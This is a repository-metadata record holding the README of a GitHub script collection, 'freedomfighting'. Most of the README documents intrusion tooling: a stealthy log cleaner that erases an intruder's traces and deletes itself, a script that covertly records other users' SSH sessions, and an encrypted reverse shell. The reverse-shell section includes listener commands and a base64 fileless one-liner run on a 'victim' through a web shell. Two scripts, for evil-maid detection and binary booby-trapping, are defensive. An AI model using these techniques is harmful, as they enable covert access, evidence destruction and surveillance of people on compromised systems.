{"id":13362818,"url":"https://github.com/JusticeRage/freedomfighting","last_synced_at":"2025-03-12T15:31:00.982Z","repository":{"id":15762548,"uuid":"78690291","full_name":"JusticeRage/freedomfighting","owner":"JusticeRage","description":"A collection of scripts which may come in handy during your freedom fighting activities.","archived":false,"fork":false,"pushed_at":"2023-05-08T15:39:48.000Z","size":114,"stargazers_count":402,"open_issues_count":1,"forks_count":66,"subscribers_count":28,"default_branch":"master","last_synced_at":"2024-05-19T06:14:43.758Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":null,"language":"Python","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":null,"status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/JusticeRage.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":null,"code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null}},"created_at":"2017-01-11T23:44:40.000Z","updated_at":"2024-04-30T13:36:44.000Z","dependencies_parsed_at":"2024-01-07T05:58:29.981Z","dependency_job_id":"a0930350-bf72-467e-81eb-ff72161de49c","html_url":"https://github.com/JusticeRage/freedomfighting","commit_stats":null,"previous_names":[],"tags_count":0,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JusticeRage%2Ffreedomfighting","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JusticeRage%2Ffreedomfighting/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JusticeRage%2Ffreedomfighting/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/JusticeRage%2Ffreedomfighting/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Jus
ticeRage","download_url":"https://codeload.github.com/JusticeRage/freedomfighting/tar.gz/refs/heads/master","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":243242724,"owners_count":20259809,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-07-29T23:01:05.225Z","updated_at":"2025-03-12T15:31:00.645Z","avatar_url":"https://github.com/JusticeRage.png","language":"Python","funding_links":[],"categories":["Python","Tools","Python (1887)"],"sub_categories":["Satellite"],"readme":"# Freedom Fighting scripts\r\n\r\nThis repository contains scripts which may come in handy during your freedom fighting activities. 
It will be updated\r\noccasionally, when I find myself in need of something I can't find online.\r\nEverything here is distributed under the terms of the [GPL v3 License](https://www.gnu.org/licenses/gpl.html).\r\n\r\nContributions and pull requests are very welcome.\r\n\r\n## Table of Contents\r\n\r\n- [nojail.py](#nojailpy), a python log cleaner.\r\n- [share.sh](#sharesh), a secure file sharing script.\r\n- [autojack.py](#autojackpy), a term logger.\r\n- [listurl.py](#listurlpy), a site mapper.\r\n- [ersh.py](#ershpy), an encrypted reverse shell.\r\n- [boot_check.py](#boot_checkpy), a script to detect evil-maid attacks.\r\n- [notify_hook.py](#notify_hookpy), a way to trigger alerts when some binaries are called on a system.\r\n- [Miscellaneous](#miscellaneous) (contact and donations)\r\n\r\n## nojail.py\r\n\r\nA log cleaner which removes incriminating entries in:\r\n\r\n* `/var/run/utmp`, `/var/log/wtmp`, `/var/log/btmp` (controls the output of the `who`, `w` and `last` commands)\r\n* `/var/log/lastlog` (controls the output of the `lastlog` command)\r\n* `/var/**/*.log` (.log.1, .log.2.gz, etc. included)\r\n* Any additional file or folder designated by the user\r\n\r\nEntries are deleted based on an IP address and/or associated hostname.\r\n\r\nSpecial care is taken to avoid breaking file descriptors while tampering with logs. This means logs continue to be\r\nwritten to after they've been tampered with, making the cleanup a lot less conspicuous. 
All the work takes place in a\r\n*tmpfs* drive and any files created are wiped securely.\r\n\r\n**Warning:** The script has only been tested on Linux and will not be able to clean UTMP entries on other Unix flavors.\r\n\r\n### Usage:\r\n```\r\nusage: nojail.py [-h] [--user USER] [--ip IP] [--hostname HOSTNAME]\r\n                    [--verbose] [--check]\r\n                    [log_files [log_files ...]]\r\n\r\n   Stealthy log file cleaner.\r\n\r\n   positional arguments:\r\n     log_files             Specify any log files to clean in addition to\r\n                           /var/**/*.log.\r\n\r\n   optional arguments:\r\n     -h, --help            show this help message and exit\r\n     --user USER, -u USER  The username to remove from the connexion logs.\r\n     --ip IP, -i IP        The IP address to remove from the logs.\r\n     --hostname HOSTNAME   The hostname of the user to wipe. Defaults to the rDNS\r\n                           of the IP.\r\n     --regexp REGEXP, -r REGEXP\r\n                           A regular expression to select log lines to delete\r\n                           (optional)\r\n\r\n     --verbose, -v         Print debug messages.\r\n     --check, -c           If present, the user will be asked to confirm each\r\n                           deletion from the logs.\r\n     --daemonize, -d       Start in the background and delete logs when the\r\n                           current session terminates. Implies --self-delete.\r\n     --self-delete, -s     Automatically delete the script after its execution.\r\n```\r\n\r\nBy default, if no arguments are given, the script will try to determine the IP address to scrub based on the\r\n`SSH_CONNECTION` environment variable. 
Any entry matching the reverse DNS of that IP will be removed as well.\r\n\r\n#### Basic example:\r\n\r\n```\r\n./nojail.py --user root --ip 151.80.119.32 /etc/app/logs/access.log --check\r\n```\r\n...will remove all entries for the user root where the IP address is 151.80.119.32 or the hostname is `manalyzer.org`.\r\nThe user will also be prompted before deleting each record because of the `--check` option. Finally, the file\r\n`/etc/app/logs/access.log` will be processed in addition to all the default ones.\r\n\r\nIf folders are given as positional arguments (`/etc/app/logs/` for instance), the script will recursively crawl them and\r\nclean any file with the `.log` extension (*.log.1, *.log.2.gz, etc. included).\r\n\r\n#### Regular expressions\r\n\r\nYou may want to remove arbitrary lines from the log file as well. To do so, use the `--regexp` option. For example,\r\nthe following command line will look for all POST requests to PHP files from the specified IP:\r\n\r\n```\r\n./nojail.py --ip 151.80.119.32 --regexp \"POST /.*?\\.php\"\r\n```\r\n\r\n#### Daemonizing the script\r\n\r\n```\r\n./nojail.py --daemonize\r\n```\r\nAssuming this is run from an SSH connection, this command will delete all logs pertaining to the current user's activity\r\nwith the detected IP address and hostname right after the connection is closed. The script will then\r\nautomatically delete itself.\r\nPlease bear in mind that you won't have any opportunity to receive error messages from the application. You are encouraged\r\nto try deleting the logs once before spawning the daemon to make sure that the arguments you specified are correct.\r\nIf you are in a shell with no TTY, the script will not be able to detect when the session ends. 
You will\r\nbe notified that the logs will be deleted in 60 seconds, and that you should log out before then (or risk creating more\r\nentries after the script has run).\r\n\r\n### Sample output:\r\n```\r\nroot@proxy:~# ./nojail.py\r\n[ ] Cleaning logs for root (XXX.XXX.XXX.XXX - domain.com).\r\n[*] 2 entries removed from /var/run/utmp!\r\n[*] 4 entries removed from /var/log/wtmp!\r\n[ ] No entries to remove from /var/log/btmp.\r\n[*] Lastlog set to 2017-01-09 17:12:49 from pts/0 at lns-bzn-XXX-XXX-XXX-XXX-XXX.adsl.proxad.net\r\n[*] 4 lines removed from /var/log/nginx/error.log!\r\n[*] 11 lines removed from /var/log/nginx/access.log!\r\n[*] 4 lines removed from /var/log/auth.log!\r\n```\r\n\r\n### Disclaimer\r\nThis script is provided without any guarantees.\r\nDon't blame me if it doesn't wipe all traces of something you shouldn't have done in the first place.\r\n\r\n## share.sh\r\n\r\nA portable and secure file sharing script. While freedom fighting, it is generally not possible to scp files into\r\ncompromised machines. Alternate ways to upload files are needed, but most sharing services are either too restrictive\r\nor do not provide a way to retrieve files easily from the command line. Security considerations may also prevent\r\npeople from uploading sensitive files to cloud providers for fear that they will keep a copy of it forever.\r\n\r\nThis small and portable bash script relies on [transfer.sh](https://transfer.sh) to solve that problem. It...\r\n* Encrypts files before uploading them (symmetric AES-256-CBC).\r\n* Automatically uses `torify` if it is present on the system for increased anonymity.\r\n\r\nThe only dependencies needed are `openssl` and either `curl` or `wget`.\r\n\r\n### Usage\r\n\r\n```\r\nroot@proxy:~# ./share.sh ~/file_to_share \"My_Secure_Encryption_Key!\"\r\nSuccess! 
Retrieval command: ./share.sh -r file_to_share \"My_Secure_Encryption_Key!\" https://transfer.sh/BQPFz/28239\r\nroot@proxy:~# ./share.sh -r file_to_share \"My_Secure_Encryption_Key!\" https://transfer.sh/BQPFz/28239\r\nFile retrieved successfully!\r\n```\r\n\r\nAdditional arguments during the upload allow you to control the maximum number of downloads allowed for the file (`-m`)\r\nand how many days transfer.sh will keep it (`-d`). The default value for both these options is 1.\r\n\r\n**Warning**: Do not use spaces in the encryption key, or only the first word of your passphrase will be taken into\r\naccount. This is due to the way `getopts` handles arguments (I think). Pull requests are welcome if anyone is interested in\r\nfixing this.\r\n\r\n## autojack.py\r\n\r\nAutoJack is a short script leveraging EmptyMonkey's [shelljack](https://github.com/emptymonkey/shelljack) to log the \r\nterminal of any user connecting through SSH. It watches ```auth.log``` for successful\r\nconnections, figures out the PID of the user's ```bash``` process, and leaves the rest to \r\n```shelljack```.\r\n \r\nLaunch it in a _screen_, and wait until other users log in. Their session will be\r\nlogged to ```/root/.local/sj.log.[user].[timestamp]```.\r\n \r\nThe script is not particularly stealthy (no attempt is made to hide the ```shelljack``` process) but it\r\nwill get the job done. Note that to avoid self-incrimination, the ```root``` user is not \r\ntargeted (this can be trivially commented out in the code).\r\n\r\n## listurl.py\r\n\r\nListURL is a multi-threaded website crawler which obtains a list of available pages from the target. 
This script is \r\nuseful for bug-bounty hunters trying to establish the attack surface of a web application.\r\n\r\n```\r\nusage: listurl.py [-h] [--max-depth MAX_DEPTH] [--threads THREADS] [--url URL]\r\n                  [--external] [--subdomains] [-c COOKIE]\r\n                  [--exclude-regexp EXCLUDE_REGEXP]\r\n                  [--show-regexp SHOW_REGEXP] [--verbose]\r\n\r\nMap a website by recursively grabbing all its URLs.\r\n\r\noptional arguments:\r\n  -h, --help            show this help message and exit\r\n  --max-depth MAX_DEPTH, -m MAX_DEPTH\r\n                        The maximum depth to crawl (default is 3).\r\n  --threads THREADS, -t THREADS\r\n                        The number of threads to use (default is 10).\r\n  --url URL, -u URL     The page to start from.\r\n  --external, -e        Follow external links (default is false).\r\n  --subdomains, -d      Include subdomains in the scope (default is false).\r\n  -c COOKIE, --cookie COOKIE\r\n                        Add a cookies to the request. May be specified\r\n                        multiple times.Example: -c \"user=admin\".\r\n  --exclude-regexp EXCLUDE_REGEXP, -r EXCLUDE_REGEXP\r\n                        A regular expression matching URLs to ignore. The\r\n                        givenexpression doesn't need to match the whole URL,\r\n                        only a partof it.\r\n  --show-regexp SHOW_REGEXP, -s SHOW_REGEXP\r\n                        A regular expression filtering displayed results. The\r\n                        given expression is searched inside the results, it\r\n                        doesn't have tomatch the whole URL. Example: \\.php$\r\n  --no-certificate-check, -n\r\n                        Disables the verification of SSL certificates.\r\n  --output-file OUTPUT_FILE, -o OUTPUT_FILE\r\n                        The file into which the obtained URLs should be\r\n                        written\r\n  --verbose, -v         Be more verbose. 
Can be specified multiple times.\r\n```\r\n\r\nHere is the sample output for a small website:\r\n\r\n```\r\n./listurl.py -u https://manalyzer.org\r\n[*] Started crawling at depth 1.\r\n[*] Started crawling at depth 2....\r\n[*] Started crawling at depth 3.\r\n[*] URLs discovered:\r\nhttps://manalyzer.org/report/f32d9d9ff788998234fe2b542f61ee2c (GET)\r\nhttps://manalyzer.org/report/eb4d2382c25c887ebc7775d56c417c6a (GET)\r\nhttps://manalyzer.org/report/ca127ebd958b98c55ee4ef277a1d3547 (GET)\r\nhttps://manalyzer.org/upload (POST)\r\nhttps://manalyzer.org/report/dd6762a2897432fdc7406fbd2bc2fe18 (GET)\r\nhttps://manalyzer.org/report/2fba831cab210047c7ec651ebdf63f50 (GET)\r\nhttps://manalyzer.org/report/029284d88f7b8586059ddcc71031c1f1 (GET)\r\nhttps://manalyzer.org/ (GET)\r\nhttps://manalyzer.org/report/83f3c2b72e3b98e2a72ae5fdf92c164e (GET)\r\nhttps://manalyzer.org/report/1bf9277cc045362472d1ba55e4d31dd5 (GET)\r\nhttps://manalyzer.org/report/af09bf587303feb4a9e9088b17631254 (GET)\r\nhttps://manalyzer.org/report/508d8094be65eaae4d481d40aacb2925 (GET)\r\nhttps://manalyzer.org/report/0e8592aa78d6e5a14043ab466601ef9b (GET)\r\nhttps://manalyzer.org/report/b52ddc0dda64f35721d5692e168ad58c (GET)\r\nhttps://manalyzer.org (GET)\r\nhttps://manalyzer.org/bounty (GET)\r\nhttps://manalyzer.org/search (POST)\r\n```\r\n\r\n### Filtering results\r\n\r\nThe ``--exclude-regexp`` and ``--show-regexp`` options are used to control which \r\nURLs should be shown or ignored. 
For instance, in the example above, you may want\r\nto ignore pages which are likely to be very similar: \r\n\r\n```\r\n./listurl.py -u https://manalyzer.org --exclude-regexp \"/report/\"\r\n   [*] Started crawling at depth 1.\r\n   [*] Started crawling at depth 2...\r\n   [*] Started crawling at depth 3.\r\n   [*] URLs discovered:\r\n   https://manalyzer.org (GET)\r\n   https://manalyzer.org/bounty (GET)\r\n   https://manalyzer.org/upload (POST)\r\n   https://manalyzer.org/search (POST)\r\n   https://manalyzer.org/ (GET)\r\n```\r\n\r\nNote that the matching URLs will *not* be crawled. This is particularly useful\r\nwhen the script gets lost in deep comment pages or repetitive content. Alternately, \r\nyou may only be interested in PHP scripts: ``./listurl.py --show-regexp \"\\.php$\"``.\r\n\r\n### Crawl parameters\r\n\r\nBy default, the crawler only goes 3 levels deep. This is something you can control\r\nwith the ``--max-depth`` option.\r\n\r\nAnother consideration is whether URLs pointing to external domains should be followed.\r\nBy default, the script doesn't, but you can enable this by setting the ``--external``\r\nswitch. If you're not interested in random external domains but still want to extend\r\nthe crawl to subdomains, you can set the ``--subdomains`` switch:\r\n\r\n```\r\n./listurl.py -u https://google.com --subdomains\r\n[*] Started crawling at depth 1.\r\n[*] Started crawling at depth 2.^C\r\nInterrupt caught! 
Please wait a few seconds while the threads shut down...\r\n[*] URLs discovered:\r\nhttps://drive.google.com/drive/ (GET)\r\nhttps://google.com/../../policies/privacy/example/phone-number.html (GET)\r\nhttps://play.google.com/store/books/details/Markus_Heitz_Le_Secret_de_l_eau_noire?id=Oh1rDgAAQBAJ (GET)\r\nhttps://play.google.com/store/books/details/Leslie_Kelly_Face_au_d%C3%A9sir?id=mUtyDAAAQBAJ (GET)\r\nhttps://mail.google.com/mail/?tab=Tm (GET)\r\nhttps://google.com/../../policies/privacy/example/your-activity-on-other-sites-and-apps.html (GET)\r\nhttps://google.com/locations/ (GET)\r\n[...]\r\n```\r\n\r\nNotice that if the script takes too long, you can hit CTRL+C anytime to shut\r\nit down. You'll then be shown the pages discovered so far.\r\n\r\nIf you need to access authenticated pages on a website, you can provide\r\ncookies to listurl.py from the command line with the ``--cookie`` option.\r\n\r\nFinally, if you're working on a website which has an invalid or self-signed SSL \r\ncertificate, use the `--no-certificate-check` option to ignore SSL errors.\r\n\r\n## ersh.py\r\n\r\n```ersh``` is an encrypted reverse shell written in pure Python. Ever been on a\r\nbox with no standard utilities or compilation tools, and no easy way to upload\r\nbinaries? Are you afraid that an IDS will notice an outbound shell? Accidentally\r\nclosed your netcat listener because you pressed ```^C```?\r\nSuffer no more.\r\n\r\n```ersh``` offers the following features:\r\n\r\n- SSL-encrypted with both client and server authentication (SSL as in Suck-it Snort Layer).\r\n- Fully featured TTY.\r\n- Optionally file-less.\r\n- No dependencies, should run on any machine with Python \u003e= 2.6.\r\n\r\nFor a more detailed discussion about how this tool came to be, please refer to\r\nthis [blog post](https://blog.kwiatkowski.fr/?q=en/ersh).\r\n\r\n### Usage\r\n\r\nThis script **needs to be edited** before it works! 
Look for this marker near\r\nthe beginning:\r\n\r\n```\r\n###############################################################################\r\n# EDIT THE PARAMETERS BELOW THIS LINE\r\n###############################################################################\r\n```\r\n\r\nThe ```HOST``` and ```PORT``` are self-explanatory, but you may need additional help\r\nfor the SSL certificates. Nobody wants to fight against OpenSSL's client however, so\r\nyou can just use the following one-liners:\r\n\r\n```\r\nopenssl req -new -newkey rsa:2048 -days 50 -nodes -x509 -subj \"/C=US/ST=Maryland/L=Fort Meade/O=NSA/CN=www.nsa.gov\" -keyout server.key -out server.crt \u0026\u0026 cat server.key server.crt \u003e server.pem \u0026\u0026 openssl dhparam 2048 \u003e\u003e server.pem\r\nopenssl req -new -newkey rsa:2048 -days 50 -nodes -x509 -subj \"/C=US/ST=Maryland/L=Fort Meade/O=NSA/CN=www.nsa.gov\" -keyout client.key -out client.crt\r\n```\r\n\r\nThat's it! You should now have five new files in your current folder: ```server.(crt|key|pem)```\r\nand ```client.(crt|key)```. Some of them need to be inserted in the script so\r\nthe reverse shell and the listener can authenticate each other. Specifically:\r\n\r\n- ```client_key``` should contain the contents of ```client.key```.\r\n- ```client_crt``` should contain the contents of ```client.crt```.\r\n- ```server_crt``` should contain the contents of ```server.crt```.\r\n\r\nThat's it, no more editing required.\r\n\r\n### Setting up the listener\r\n\r\nConsidering that a full TLS negotiation is going to proceed, a traditional ```nc``` listener\r\nwill not suffice here. ```socat``` has been chosen for this task, due to its ability to\r\nhandle encryption and TTYs. 
On Debian-based distributions, you should be able to obtain\r\nit by simply running ```sudo apt-get install socat```.\r\n\r\nAssuming you're still in the folder where you generated the keys and certificates, and\r\nyou want to listen on port 443, here is the command line you should run on the\r\nmachine where the reverse shell will arrive:\r\n\r\n```\r\nsocat openssl-listen:443,reuseaddr,cert=server.pem,cafile=client.crt,method=TLS1 file:`tty`,raw,echo=0\r\n```\r\n\r\n### Running from memory\r\n\r\nYou don't need to copy the script to the remote machine for it to work. Here is a simple way to run it\r\nfrom a non-interactive shell. Copy the whole script to your clipboard and run the following commands on\r\nthe victim (the closing heredoc delimiter must be a bare `EOF`, without quotes, or the shell will keep reading):\r\n\r\n```\r\npython - \u003c\u003c'EOF'\r\n[paste script contents here]\r\nEOF\r\n```\r\n\r\nIf you're trying to launch ```ersh.py``` from an environment which doesn't support multiple lines (such\r\nas Weevely), you can also try generating a one-liner like this:\r\n\r\n```\r\nroot@attacker:~/freedomfighting# gzip -c ersh.py | base64\r\nH4sICPMsblkAA2UucHkA1Vp5k6O4kv+fT8FUx8RULdU2PsB27asXCxh8Ajbgs2eiHocwmNMcxvjT\r\nr4Rdd0/PvNiZjV0iqgxSKpXK45cpxJef6nma1A03rMdl5kQhdnNzg4EkdWpxiRsl/l/jPM1cEyj6\r\n[...]\r\n\r\nweevely\u003e echo \"H4sICPMsblkAA2...\" | base64 -d | gunzip | python\r\n```\r\n\r\n### Sample output\r\n\r\nOn the receiver machine:\r\n\r\n```\r\nroot@attacker:~/freedomfighting# socat openssl-listen:8080,reuseaddr,cert=server.pem,cafile=client.crt,method=TLS1 file:`tty`,raw,echo=0\r\n```\r\n\r\nOn the victim:\r\n\r\n```\r\nroot@victim:~# python ersh.py\r\n[*] Connection established!\r\nroot@victim:~#\r\n```\r\n\r\nAnd on the receiver again:\r\n\r\n```\r\nroot@attacker:~/freedomfighting# socat openssl-listen:8080,reuseaddr,cert=server.pem,cafile=client.crt,method=TLS1 file:`tty`,raw,echo=0\r\nroot@victim:~# unset HISTFILE\r\nroot@victim:~#\r\n```\r\n\r\n## boot_check.py\r\n\r\nThis script was written to detect evil maid attacks. 
It does so by checking at\r\nboot time if the hard drive was powered on but not the OS (for instance, if it\r\nwas taken out of the computer for a copy, or if someone tried to boot the\r\nmachine but was stopped by an FDE password).\r\n\r\n### Installation:\r\n\r\nYou need to make sure this script will run at every boot. The following\r\ninstructions will work on distributions using systemd.\r\n\r\n* Copy boot_check.service to `/etc/systemd/system/`. Fix paths inside of it as needed.\r\n   The script will run as root so make sure it is not world writable!\r\n* `#\u003e systemctl enable boot_check.service`\r\n\r\nInstall dependencies:\r\n\r\n* `#\u003e apt install smartmontools dialog`\r\n\r\nRun the script once so it initializes:\r\n\r\n* `#\u003e ./boot_check.py`\r\n\r\nIf a confirmation message appears, you're good to go.\r\n\r\n### Testing\r\n\r\nTo verify that the script works, do the following:\r\n- Do not just reboot the computer, as the power to the hard drive may not be cut. \r\nTurn it off completely.\r\n- If you don't want to take out your drive and plug it into another machine, you\r\ncan try interrupting the boot process. This has to happen before the script is \r\nexecuted, but after the drive has been powered on (which means after the BIOS\r\npassword). A good moment to interrupt the boot process is when the prompt for the\r\nFDE password is shown.\r\n- Then turn on the computer again, and you should see the alert on your screen\r\na few seconds after your computer has booted up.\r\n\r\n## notify_hook.py\r\n\r\nThis script was created to provide a simple way to \"booby-trap\" certain \r\nexecutables on a Linux system. The idea is to detect intruders when they use\r\ncertain binaries (`id`, `whoami`, `gcc`) on a server they don't own.\r\n\r\nTo protect those binaries, `notify_hook.py` creates symbolic links to this \r\nscript higher up in the `PATH`. 
`notify_hook` will then send you an alert\r\nand call the intended program in a transparent fashion. For instance, if\r\nyou want to \"protect\" `id`, just create the following symlink on your machine:\r\n\r\n```\r\nln -s path/to/notify_hook.py /usr/local/bin/id\r\n```\r\n\r\n...and all future calls to `id` should be routed through this script. This\r\nis obviously not a foolproof way to detect hackers on your systems, but it\r\nshould nonetheless catch the most careless intruders.\r\n\r\n### Customization\r\n\r\nSome programs and scripts on your system may regularly invoke some of the\r\nbinaries you wish to protect. In that case, you can edit a variable called \r\n`CALLER_WHITELIST` placed at the beginning of the script. Put the name of\r\nthose processes in the list to disable alerts from them (regular expressions\r\nare accepted).\r\n\r\nThe current notification method implemented in this script is a text message\r\nsent through Signal with AsamK's \r\n[signal-cli](https://github.com/AsamK/signal-cli). You'll need to install this\r\nproject separately if you want to use it, or, more likely, replace the \r\n`notify_callback` function placed on top of `notify_hook.py` with whatever\r\nsuits your needs.\r\n\r\n### Contact\r\n[![](https://manalyzer.org/static/mail.png)](justicerage@manalyzer[.]org)\r\n[![](https://manalyzer.org/static/twitter.png)](https://twitter.com/JusticeRage)\r\n[![](https://manalyzer.org/static/gpg.png)](https://pgp.mit.edu/pks/lookup?op=vindex\u0026search=0x40E9F0A8F5EA8754)\r\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FJusticeRage%2Ffreedomfighting","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FJusticeRage%2Ffreedomfighting","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FJusticeRage%2Ffreedomfighting/lists"}